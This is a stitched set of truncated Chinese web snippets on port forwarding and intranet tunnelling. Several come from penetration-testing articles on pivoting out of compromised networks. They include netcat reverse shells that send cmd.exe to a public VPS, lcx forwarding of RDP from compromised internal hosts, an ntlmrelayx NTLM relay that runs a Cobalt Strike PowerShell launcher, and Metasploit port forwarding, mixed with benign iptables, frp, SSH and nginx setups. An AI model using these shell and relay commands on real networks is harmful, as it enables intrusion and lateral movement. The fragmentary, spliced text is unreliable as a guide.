1、实验环境 2、实验条件: 3、注意事项: 4、实践操作: 1、实验环境如下 服务器均采用CentOS 6.5 服务器名 内网地址 外网地址 A 10.1.1.212 54.227.20.225 B...10.1.2.36 None 2、实验条件: 服务器A设置路由转发并通过iptables进行端口转发,服务器B上开启memcached服务,使访问服务器A可以连接到服务器B的memcached服务 3...、注意事项: 本次仅作测试环境,所以外部安全组已全部放开,路由表已设置互通 4、实践操作: 在服务器A上进行操作 1、开启内核转发 vi /etc/sysctl.conf 将 net.ipv4.ip_forward...to-destination 10.1.2.36:11211 #将访问10.1.1.212:11211的请求发送到 10.1.2.36:11211 service iptables save ### 拓展 把eth0的流量转发出去
工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...服务器地址 server_addr = x.x.x.x #服务器绑定端口 server_port = 7000 #服务器连接密码 token = 12345678 #服务名称(自定义) [ssh] #转发协议类型
Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linux版lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...外网服务器开始进行流量转发: ? 成功访问到内网服务器远程桌面: ? 反向端口转发 假设这次拿下了外网服务器、内网服务器的命令行权限,并知道内网服务器账号、密码。...想要通过攻击机,远程连接内网服务器远程桌面服务。但由于内网防火墙包过滤策略,不允许外网服务器访问它。 此时可以通过反向端口转发,由内网服务器主动发起转发。 ?...外网服务器开始转发流量: ? 成功转发流量至内网服务器: ? Linux版lcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ?...尝试连接linux的8888端口: ? 成功连接至window的3389端口: ? Part.2 Netsh 本地端口转发 Netsh 是Windows自带的命令行脚本工具,它可以建立端口映射。
工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...linux上的操作是一样的,更换几个命令即可
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。 ?...reDuh也是一款内网渗透利器,这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。...山转一角 Linux一句话端口转发 我们在渗透测试中回经常遇见Linux主机环境,我们将获取到Linux主机的shell为内网渗透的工作之一,但有时候把并不是我们想象的那样简单,毕竟目标主机是处在内网环境中没有公网...冰雪来袭 socat 反弹一句话 Socat是Linux 下一个多功能的网络工具,它与nc工具差不多,但是看了网上多说人反馈相比NC工具方便的多。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 内网ip>内网端口> 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 内网主机ip> -p1 内网主机端口> -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
(Linux) Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发...(Windows的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机...(公网服务器是Windows) LCX实现3389到内网主机(公网服务器是Linux) 内网转发 在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网...) Ssocks是Linux下一款端口转发的工具,而proxychains代理链是Linux下一款代理设置工具。...我们现在想SSH到内网Linux主机。 于是,我们还可以利用lcx来进行3389端口的转发。
Hash转发 如果我们捕获到NTLM hash的域用户是某台远程主机的本地管理员,我们则可以执行pass-the hash攻击来获得远程代码执行。...虽然Net-NTLM hash不能直接用来hash传递,但我们可以将它转发到另一台主机。 需要注意的是仅在SMB签名被禁用的情况可以转发。SMB签名仅在域控是默认启用的。...在转发成功后,可以执行我们指定的命令。这里我们执行一个cobaltstrike PowerShell上线命令。...hash,-t指定转发的目标主机IP,这里为appsrv01的IP,-c指定要执行的命令: sudo impacket-ntlmrelayx --no-http-server -smb2support...需要注意的是,这里只是为了介绍Hash转发的概念,所以APPSRV01的Windows defender是关闭状态。
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP....tar.gz 2.3解压tar -zxvf frp_0.31.2_linux_amd64.tar.gz 文件夹改个名,方便使用 cp -r frp_0.31.2_linux_amd64 frp 把解压出来的文件夹复制到你想要的目录下...frp实际使用时,会按照端口号进行对应的转发, 上面frpc.ini的rdp、smb字段都是自己定义的规则,自定义端口对应时格式如下。 “[xxx]”表示一个规则名称,自己定义,便于查询即可。...“type”表示转发的协议类型,有TCP和UDP等选项可以选择,如有需要请自行查询frp手册。 “local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。
0x01 背景前言 在平时的渗透测试过程中经常会用到端口转发,通过代理脚本将内网流量代到本地进行访问,方便下一步对内网进行横向渗透。...当拿下内网一台主机的控制权后,需要通过代理转发的方式进入内网,整理几种常见的内网代理转发方法。 本次以远程桌面连接来进行说明,介绍几种常用的连接方式。...0x04 转发工具使用 0x04.1 msf反弹木马 使用条件:服务器通外网,拥有自己的公网ip msf是我进行内网渗透中用的最多的工具,它内置了很多强大的功能,用起来相当方便。...msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。...portfwd add -l 5555 -p 3389 -r 172.16.86.153 转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口
目前开发多数趋于前后端分离,后端开发人员有的时候懒得搭建前端环境,可是写后端又不便于联调,经常被这个困扰中,本文介绍如何用nginx 转发。 前提:有一套完整的环境,可以访问 整个环境。...步骤: 1、本地项目启动,eg:localhost:8080 2、配置本地 host 127.0.0.1 wangzhi.com 说明:需要把环境地址,转到本地,才能走本地的nginx转发 3、安装nginx
端口转发和端口映射 目录 端口转发和端口映射 两者的区别 端口转发和端口映射 介绍端口转发和端口映射之前先了解两个概念:正向连接 和 反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器...比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。...这就是端口转发,其转发一个端口收到的流量,给另一个主机 两者的区别 按理解意思,是用不同的方法实现同样的目标。 端口转发:你给我了,我打开看看,发现这上面标志显示是要给张三,那么我就给张三去。
不过其实除了这个功能,它的隧道转发功能更是吸引人。下面是个人根据自己的需求以及在网上查找的资料配合自己的实际操作所得到的一些心得。...-L port:host:hostport 将本地机(客户机)的某个端口转发到远端指定机器的指定端口....可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口....可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口....只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发. -C Enable compression. 压缩数据传输。
参考链接 https://www.chenyudong.com/archives/linux-ssh-port-dynamic-forward.htmlhttps://mp.weixin.qq.com/...实验环境 一台攻击者kali一台跳板机kali一台内网centos ? 目标:从攻击者访问到内网192.168.254.150的服务 实验步骤 1....先在攻击者上执行将内网的80端口转发到攻击者的12345端口,当访问攻击者的12345端口时,相当于访问了内网的80 ssh -N -L 54321:192.168.254.150:22 root@192.168.0.137...(远端)的网络里将内网的端口转发到vps的某个端口上,以达到外网可以访问的目的在这里kali充当我们的vps 实验环境 一台攻击者kali一台跳板机kali一台内网centos ?...目标:从攻击者访问到内网192.168.254.150的服务 实验步骤 1.先在跳板机上执行将内网的80端口转发到攻击者的12345端口,当访问攻击者的12345端口时,相当于访问了内网的80 root
今天说一说udp端口转发 Linux,Linux iptables 端口转发[通俗易懂],希望能够帮助大家进步!!!...准备: 1, UDP端口范围映射 2, tcp 端口范围映射 3, 本机端口转发 4, 单个端口转发 打开转发 [root@CentOS ~]# cat /etc/sysctl.conf | grep...-t nat -A PREROUTING -p udp --dport 5000:6000 -j DNAT --to 192.168.66.2:5000-6000 【注意】这样写,将导致不可预测的端口转发匹配...4, 单个端口转发 端口转发 tcp模式:将访问本机1122端口数据包转发给192.168.66.2:5566 iptables -t nat -A PREROUTING -p tcp --dport...1122 -j DNAT --to-destination 192.168.66.2:5566 端口转发 udp模式:将访问本机2233端口数据包转发给192.168.66.2:4455 iptables
:这里公网服务器B和内网服务器A都必须是Linux系统,才能建立SSH隧道 现在我们有这么一个环境,我们拿到了公网服务器B的权限,并通过公网服务器B进一步内网渗透,拿到了内网服务器A的权限。...我们可以将内网服务器A的22端口远程转发到公网服务器的1234端口。...8888端口,于是内网服务器A将本地的22号端口反向代理到了公网服务器B的8888端口,公网服务器B又将8888端口的流量转发到了本地的1234端口,所以黑客SSH连接到了内网服务器A。...在内网A机器上的操作: ssh -p 1234 root@100.100.10.12 #ssh连接到公网服务器的1234端口 参考文章:实战SSH端口转发 使用SSH反向隧道进行内网穿透...相关文章:内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 责编:vivian 来源:谢公子博客
/fatedier/frp 硬件 一台无公网的服务器(内网主机) 一台有公网的服务器(外网主机) 一台电脑(自己操作的) 前言 资源参考 部分请参考文章我以前发布的文章 Centos 搭建 Frp 内网映射服务...Frp 内网映射 —— 前端 [客户端] 搭建 废话 (这还是一篇水文)其实这篇文章就是记一次搭建一次对外开放的一个内网网盘,采用的是我以前发布的博文 Centos 搭建 Frp 内网映射服务 支持。...搭建内网穿透 外网主机 本次搭建采用 Frp 版本为 v0.35.1 (Centos7系统) 创建域名 创建两个地址,一个作为网盘,一个作为后端。...或者参考文章:Centos 搭建 Frp 内网映射服务 内网主机 依旧需要在主机内下载 frp # 下载(建议相同版本) wget https://github.com/fatedier/frp/releases.../download/v0.35.1/frp_0.35.1_linux_amd64.tar.gz # 解压 tar zxf frp_0.35.1_linux_amd64.tar.gz # 进入文件夹 cd
项目介绍 Fuso是一款体积小,快速, 稳定, 高效, 轻量的内网穿透, 端口转发工具,支持多连接,级联代理,传输加密 项目特性 ✔ 项目使用 Step 1:下载解压得到 fus,fuc两个程序, 将fus...端口转发 fuc --forward-host xxx.xxx.xxx.xxx --forward-port --forward-host: 转发到的地址 --forward-port: 转发到的端口...如: 转发流量到内网 10.10.10.4:3389 > fuc --forward-host 10.10.10.4 --forward-port 3389 2. socks5: fuc..., 认证账号, 默认账号 anonymous --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp 如: 开启udp转发与密码认证 > fuc --...指定穿透成功时访问的端口 fuc -b xxxx -b | --visit-bind-port: 可选的, 默认随机分配 如: 访问外网端口 8888 转发到内网 80 > fuc
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。 这样的就是内网服务器了。...优点,搞定内网肉鸡....肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave
Linux 端口转发...POSTROUTING -d 10.0.1.123 -p tcp -m tcp --dport 3389 -j SNAT --to-source 10.0.0.254 #外网接口地址114.114.114.114 内网接口地址...、转发的端口 启动rinetd服务 rinetd -c /etc/rinetd.conf SSH ssh转发命令 本地执行建立隧道,通过本机端口访问内部主机 ssh -N -L 0.0.0.0:888...:192.168.10.1:55555 -p55555 root@192.168.10.1 -f #外网ssh访问转发主机888端口就可以连接到内网192.168.10.1; -L 本机端口,-f...proxy_connect_timeout 1s; proxy_timeout 3s; proxy_pass manager; } } # 通过nginx 9001端口可以访问内网
领取专属 10元无门槛券
手把手带您无忧上云